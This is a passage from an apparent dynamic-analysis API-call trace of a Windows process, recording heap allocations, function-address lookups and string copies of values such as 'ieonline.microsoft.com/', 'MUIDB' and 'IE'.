Flags=0x0, Size=0xc) returned 0x61f5c0 [0181.486] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.486] GetProcessHeap () returned 0x5f0000 [0181.486] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.486] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636140, Size=0x21) returned 0x613770 [0181.486] GetProcessHeap () returned 0x5f0000 [0181.486] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5c0 [0181.486] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.486] GetProcessHeap () returned 0x5f0000 [0181.486] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.486] GetProcessHeap () returned 0x5f0000 [0181.486] GetProcessHeap () returned 0x5f0000 [0181.486] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f560 [0181.486] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.486] GetProcessHeap () returned 0x5f0000 [0181.486] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.486] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613770, Size=0x41) returned 0x6209b0 [0181.486] GetProcessHeap () returned 0x5f0000 [0181.486] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f660 [0181.486] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.486] GetProcessHeap () returned 0x5f0000 [0181.486] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.486] GetProcessHeap () returned 0x5f0000 [0181.487] GetProcessHeap () returned 0x5f0000 [0181.487] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f600 [0181.487] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.487] GetProcessHeap () returned 0x5f0000 [0181.487] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.487] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6209b0, Size=0x25) returned 0x613770 [0181.487] GetProcessHeap () returned 0x5f0000 [0181.487] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5a0 | out: hHeap=0x5f0000) returned 1 [0181.487] GetProcessHeap () returned 0x5f0000 [0181.487] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627350 | out: hHeap=0x5f0000) returned 1 [0181.487] lstrlenA (lpString="/") returned 1 [0181.487] GetProcessHeap () returned 0x5f0000 [0181.487] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f580 [0181.487] lstrcpyA (in: lpString1=0x61f580, lpString2="/" | out: lpString1="/") returned="/" [0181.487] lstrlenA (lpString="ieonline.microsoft.com/") returned 23 [0181.487] GetProcessHeap () returned 0x5f0000 [0181.487] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x6363a0 [0181.487] lstrcpyA (in: lpString1=0x6363a0, lpString2="ieonline.microsoft.com/" | out: lpString1="ieonline.microsoft.com/") returned="ieonline.microsoft.com/" [0181.487] lstrlenA (lpString="ieonline.microsoft.com/") returned 23 [0181.487] GetProcessHeap () returned 0x5f0000 [0181.487] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x636260 [0181.487] lstrcpyA (in: lpString1=0x636260, lpString2="ieonline.microsoft.com/" | out: lpString1="ieonline.microsoft.com/") returned="ieonline.microsoft.com/" [0181.487] GetProcessHeap () returned 0x5f0000 [0181.487] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x17) returned 0x6363c0 [0181.487] GetProcessHeap () returned 0x5f0000 [0181.487] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x17) returned 0x636160 [0181.487] GetProcessHeap () returned 0x5f0000 [0181.487] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6363c0 | out: hHeap=0x5f0000) returned 1 [0181.487] GetProcessHeap () returned 0x5f0000 [0181.487] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x636260 | out: hHeap=0x5f0000) returned 1 [0181.487] GetProcessHeap () returned 0x5f0000 [0181.488] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6363a0 | out: hHeap=0x5f0000) returned 1 [0181.488] GetProcessHeap () returned 0x5f0000 [0181.488] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.488] lstrlenA (lpString="ieonline.microsoft.com/") returned 23 [0181.488] GetProcessHeap () returned 0x5f0000 [0181.488] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x6363a0 [0181.488] lstrcpyA (in: lpString1=0x6363a0, lpString2="ieonline.microsoft.com/" | out: lpString1="ieonline.microsoft.com/") returned="ieonline.microsoft.com/" [0181.488] GetProcessHeap () returned 0x5f0000 [0181.488] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f580 [0181.488] GetProcessHeap () returned 0x5f0000 [0181.488] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f600 [0181.488] GetProcessHeap () returned 0x5f0000 [0181.488] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.488] GetProcessHeap () returned 0x5f0000 [0181.488] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6363a0 | out: hHeap=0x5f0000) returned 1 [0181.488] lstrlenA (lpString="||") returned 2 [0181.488] GetProcessHeap () returned 0x5f0000 [0181.488] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f480 [0181.488] lstrcpyA (in: lpString1=0x61f480, lpString2="||" | out: lpString1="||") returned="||" [0181.488] lstrlenA (lpString="|") returned 1 [0181.488] GetProcessHeap () returned 0x5f0000 [0181.488] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f620 [0181.488] lstrcpyA (in: lpString1=0x61f620, lpString2="|" | out: lpString1="|") returned="|" [0181.488] lstrlenA (lpString="1130274944") returned 10 [0181.488] GetProcessHeap () returned 0x5f0000 [0181.488] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f5b0 [0181.488] lstrcpyA (in: lpString1=0x61f5b0, lpString2="1130274944" | out: lpString1="1130274944") returned="1130274944" [0181.488] GetProcessHeap () returned 0x5f0000 [0181.488] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f580 [0181.488] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.488] GetProcessHeap () returned 0x5f0000 [0181.488] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.488] StrToInt64ExA (in: pszString="1130274944", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.488] lstrlenA (lpString="30991936") returned 8 [0181.489] GetProcessHeap () returned 0x5f0000 [0181.489] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f630 [0181.489] lstrcpyA (in: lpString1=0x61f630, lpString2="30991936" | out: lpString1="30991936") returned="30991936" [0181.489] GetProcessHeap () returned 0x5f0000 [0181.489] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f540 [0181.489] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.489] GetProcessHeap () returned 0x5f0000 [0181.489] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.489] StrToInt64ExA (in: pszString="30991936", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.489] lstrlenA (lpString="|") returned 1 [0181.489] GetProcessHeap () returned 0x5f0000 [0181.489] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f640 [0181.489] lstrcpyA (in: lpString1=0x61f640, lpString2="|" | out: lpString1="|") returned="|" [0181.489] lstrlenA (lpString="1130274944") returned 10 [0181.489] GetProcessHeap () returned 0x5f0000 [0181.489] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f660 [0181.489] lstrcpyA (in: lpString1=0x61f660, lpString2="1130274944" | out: lpString1="1130274944") returned="1130274944" [0181.489] GetProcessHeap () returned 0x5f0000 [0181.489] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f560 [0181.489] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.489] GetProcessHeap () returned 0x5f0000 [0181.489] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.489] StrToInt64ExA (in: pszString="1130274944", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.489] lstrlenA (lpString="30991936") returned 8 [0181.489] GetProcessHeap () returned 0x5f0000 [0181.489] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f540 [0181.489] lstrcpyA (in: lpString1=0x61f540, lpString2="30991936" | out: lpString1="30991936") returned="30991936" [0181.490] GetProcessHeap () returned 0x5f0000 [0181.490] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f670 [0181.490] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.490] GetProcessHeap () returned 0x5f0000 [0181.490] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f670 | out: hHeap=0x5f0000) returned 1 [0181.490] StrToInt64ExA (in: pszString="30991936", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.490] lstrlenA (lpString="|") returned 1 [0181.490] GetProcessHeap () returned 0x5f0000 [0181.490] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f510 [0181.490] lstrcpyA (in: lpString1=0x61f510, lpString2="|" | out: lpString1="|") returned="|" [0181.490] lstrlenA (lpString="|") returned 1 [0181.490] GetProcessHeap () returned 0x5f0000 [0181.490] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f670 [0181.490] lstrcpyA (in: lpString1=0x61f670, lpString2="|" | out: lpString1="|") returned="|" [0181.490] lstrlenA (lpString="|") returned 1 [0181.490] GetProcessHeap () returned 0x5f0000 [0181.490] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f490 [0181.490] lstrcpyA (in: lpString1=0x61f490, lpString2="|" | out: lpString1="|") returned="|" [0181.490] lstrlenA (lpString="|") returned 1 [0181.490] GetProcessHeap () returned 0x5f0000 [0181.490] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f4a0 [0181.490] lstrcpyA (in: lpString1=0x61f4a0, lpString2="|" | out: lpString1="|") returned="|" [0181.490] lstrlenA (lpString="|") returned 1 [0181.490] GetProcessHeap () returned 0x5f0000 [0181.490] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f520 [0181.490] lstrcpyA (in: lpString1=0x61f520, lpString2="|" | out: lpString1="|") returned="|" [0181.490] GetProcessHeap () returned 0x5f0000 [0181.490] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f530 [0181.490] GetProcessHeap () returned 0x5f0000 [0181.490] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f550 [0181.491] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.491] GetProcessHeap () returned 0x5f0000 [0181.491] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0181.491] GetProcessHeap () returned 0x5f0000 [0181.491] GetProcessHeap () returned 0x5f0000 [0181.491] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5a0 [0181.491] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.491] GetProcessHeap () returned 0x5f0000 [0181.491] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5a0 | out: hHeap=0x5f0000) returned 1 [0181.491] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f530, Size=0x5) returned 0x61f550 [0181.491] GetProcessHeap () returned 0x5f0000 [0181.491] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f530 [0181.491] GetProcessHeap () returned 0x5f0000 [0181.491] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f560 [0181.491] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.491] GetProcessHeap () returned 0x5f0000 [0181.491] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.491] GetProcessHeap () returned 0x5f0000 [0181.491] GetProcessHeap () returned 0x5f0000 [0181.491] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f560 [0181.491] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.491] GetProcessHeap () returned 0x5f0000 [0181.491] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.491] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f530, Size=0xb) returned 0x61f5c0 [0181.491] GetProcessHeap () returned 0x5f0000 [0181.491] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f530 [0181.491] GetProcessHeap () returned 0x5f0000 [0181.491] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.492] GetProcessHeap () returned 0x5f0000 [0181.492] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f560 [0181.492] GetProcessHeap () returned 0x5f0000 [0181.492] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5c0 [0181.492] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.492] GetProcessHeap () returned 0x5f0000 [0181.492] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.492] GetProcessHeap () returned 0x5f0000 [0181.492] GetProcessHeap () returned 0x5f0000 [0181.492] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f580 [0181.492] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.492] GetProcessHeap () returned 0x5f0000 [0181.492] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.492] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f560, Size=0xb) returned 0x61f580 [0181.492] GetProcessHeap () returned 0x5f0000 [0181.492] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f560 [0181.492] GetProcessHeap () returned 0x5f0000 [0181.492] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.492] lstrlenA (lpString="392F526C06816A85186842D307536B22") returned 32 [0181.492] GetProcessHeap () returned 0x5f0000 [0181.492] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x21) returned 0x613980 [0181.492] lstrcpyA (in: lpString1=0x613980, lpString2="392F526C06816A85186842D307536B22" | out: lpString1="392F526C06816A85186842D307536B22") returned="392F526C06816A85186842D307536B22" [0181.492] GetProcessHeap () returned 0x5f0000 [0181.492] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2e) returned 0x613860 [0181.492] GetProcessHeap () returned 0x5f0000 [0181.492] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f580 [0181.492] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.492] GetProcessHeap () returned 0x5f0000 [0181.492] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.493] GetProcessHeap () returned 0x5f0000 [0181.493] GetProcessHeap () returned 0x5f0000 [0181.493] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f580 [0181.493] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.493] GetProcessHeap () returned 0x5f0000 [0181.493] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.493] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613860, Size=0x2d) returned 0x6137a0 [0181.493] lstrlenA (lpString="MUIDB") returned 5 [0181.493] GetProcessHeap () returned 0x5f0000 [0181.493] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f580 [0181.493] lstrcpyA (in: lpString1=0x61f580, lpString2="MUIDB" | out: lpString1="MUIDB") returned="MUIDB" [0181.493] GetProcessHeap () returned 0x5f0000 [0181.493] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x61f590 [0181.493] GetProcessHeap () returned 0x5f0000 [0181.493] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5a0 [0181.493] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.493] GetProcessHeap () returned 0x5f0000 [0181.493] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5a0 | out: hHeap=0x5f0000) returned 1 [0181.493] GetProcessHeap () returned 0x5f0000 [0181.493] GetProcessHeap () returned 0x5f0000 [0181.493] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5a0 [0181.493] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.493] GetProcessHeap () returned 0x5f0000 [0181.493] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5a0 | out: hHeap=0x5f0000) returned 1 [0181.493] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f590, Size=0x9) returned 0x61f5a0 [0181.493] GetProcessHeap () returned 0x5f0000 [0181.493] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613800 [0181.494] GetProcessHeap () returned 0x5f0000 [0181.494] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f590 [0181.494] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.494] GetProcessHeap () returned 0x5f0000 [0181.494] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f590 | out: hHeap=0x5f0000) returned 1 [0181.494] GetProcessHeap () returned 0x5f0000 [0181.494] GetProcessHeap () returned 0x5f0000 [0181.494] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f590 [0181.494] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.494] GetProcessHeap () returned 0x5f0000 [0181.494] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f590 | out: hHeap=0x5f0000) returned 1 [0181.494] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613800, Size=0x21) returned 0x613aa0 [0181.494] lstrlenA (lpString="IE") returned 2 [0181.494] GetProcessHeap () returned 0x5f0000 [0181.494] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f590 [0181.494] lstrcpyA (in: lpString1=0x61f590, lpString2="IE" | out: lpString1="IE") returned="IE" [0181.494] GetProcessHeap () returned 0x5f0000 [0181.494] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x636420 [0181.494] GetProcessHeap () returned 0x5f0000 [0181.494] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5c0 [0181.494] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.494] GetProcessHeap () returned 0x5f0000 [0181.494] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.494] GetProcessHeap () returned 0x5f0000 [0181.494] GetProcessHeap () returned 0x5f0000 [0181.494] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5c0 [0181.495] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.495] GetProcessHeap () returned 0x5f0000 [0181.495] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.495] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636420, Size=0x11) returned 0x6360a0 [0181.495] GetProcessHeap () returned 0x5f0000 [0181.495] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11) returned 0x6360c0 [0181.495] GetProcessHeap () returned 0x5f0000 [0181.495] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6360c0, Size=0x23) returned 0x6139b0 [0181.495] GetProcessHeap () returned 0x5f0000 [0181.495] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x636260 [0181.495] GetProcessHeap () returned 0x5f0000 [0181.495] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636260, Size=0x27) returned 0x613b90 [0181.495] GetProcessHeap () returned 0x5f0000 [0181.495] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x636100 [0181.495] GetProcessHeap () returned 0x5f0000 [0181.495] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636100, Size=0x29) returned 0x613890 [0181.495] GetProcessHeap () returned 0x5f0000 [0181.495] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x15) returned 0x6363c0 [0181.495] GetProcessHeap () returned 0x5f0000 [0181.495] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6363c0, Size=0x69) returned 0x627350 [0181.495] GetProcessHeap () returned 0x5f0000 [0181.495] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x35) returned 0x635590 [0181.495] GetProcessHeap () returned 0x5f0000 [0181.495] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x635590, Size=0x6b) returned 0x627450 [0181.495] GetProcessHeap () returned 0x5f0000 [0181.495] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x36) returned 0x635150 [0181.495] GetProcessHeap () returned 0x5f0000 [0181.495] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x635150, Size=0x7b) returned 0x625ca0 [0181.495] GetProcessHeap () returned 0x5f0000 [0181.495] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3e) returned 0x635410 [0181.495] GetProcessHeap () returned 0x5f0000 [0181.495] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x635410, Size=0x7d) returned 0x625d30 [0181.495] GetProcessHeap () returned 0x5f0000 [0181.495] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3f) returned 0x6357d0 [0181.495] GetProcessHeap () returned 0x5f0000 [0181.495] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6357d0, Size=0xd5) returned 0x625dc0 [0181.496] GetProcessHeap () returned 0x5f0000 [0181.496] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6b) returned 0x637de0 [0181.496] GetProcessHeap () returned 0x5f0000 [0181.496] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x637de0, Size=0xd7) returned 0x624e10 [0181.496] GetProcessHeap () returned 0x5f0000 [0181.496] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6c) returned 0x637520 [0181.496] GetProcessHeap () returned 0x5f0000 [0181.496] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x637520, Size=0xeb) returned 0x624f00 [0181.496] GetProcessHeap () returned 0x5f0000 [0181.496] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x76) returned 0x625000 [0181.496] GetProcessHeap () returned 0x5f0000 [0181.496] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625000, Size=0xed) returned 0x625090 [0181.496] GetProcessHeap () returned 0x5f0000 [0181.496] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x77) returned 0x625000 [0181.496] GetProcessHeap () returned 0x5f0000 [0181.496] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625000, Size=0x101) returned 0x627870 [0181.496] GetProcessHeap () returned 0x5f0000 [0181.496] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x81) returned 0x61c430 [0181.496] GetProcessHeap () returned 0x5f0000 [0181.496] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61c430, Size=0x103) returned 0x627990 [0181.496] GetProcessHeap () returned 0x5f0000 [0181.496] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x82) returned 0x61c0d0 [0181.496] GetProcessHeap () returned 0x5f0000 [0181.496] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61c0d0, Size=0x10b) returned 0x627ab0 [0181.496] GetProcessHeap () returned 0x5f0000 [0181.496] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x86) returned 0x61c160 [0181.496] GetProcessHeap () returned 0x5f0000 [0181.496] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61c160, Size=0x10f) returned 0x627bd0 [0181.496] GetProcessHeap () returned 0x5f0000 [0181.496] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x627550, Size=0x5b1) returned 0x627cf0 [0181.497] GetProcessHeap () returned 0x5f0000 [0181.497] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627bd0 | out: hHeap=0x5f0000) returned 1 [0181.497] GetProcessHeap () returned 0x5f0000 [0181.497] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627ab0 | out: hHeap=0x5f0000) returned 1 [0181.497] GetProcessHeap () returned 0x5f0000 [0181.497] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627990 | out: hHeap=0x5f0000) returned 1 [0181.497] GetProcessHeap () returned 0x5f0000 [0181.497] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627870 | out: hHeap=0x5f0000) returned 1 [0181.497] GetProcessHeap () returned 0x5f0000 [0181.497] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625090 | out: hHeap=0x5f0000) returned 1 [0181.497] GetProcessHeap () returned 0x5f0000 [0181.497] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624f00 | out: hHeap=0x5f0000) returned 1 [0181.497] GetProcessHeap () returned 0x5f0000 [0181.497] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624e10 | out: hHeap=0x5f0000) returned 1 [0181.497] GetProcessHeap () returned 0x5f0000 [0181.497] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625dc0 | out: hHeap=0x5f0000) returned 1 [0181.497] GetProcessHeap () returned 0x5f0000 [0181.497] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625d30 | out: 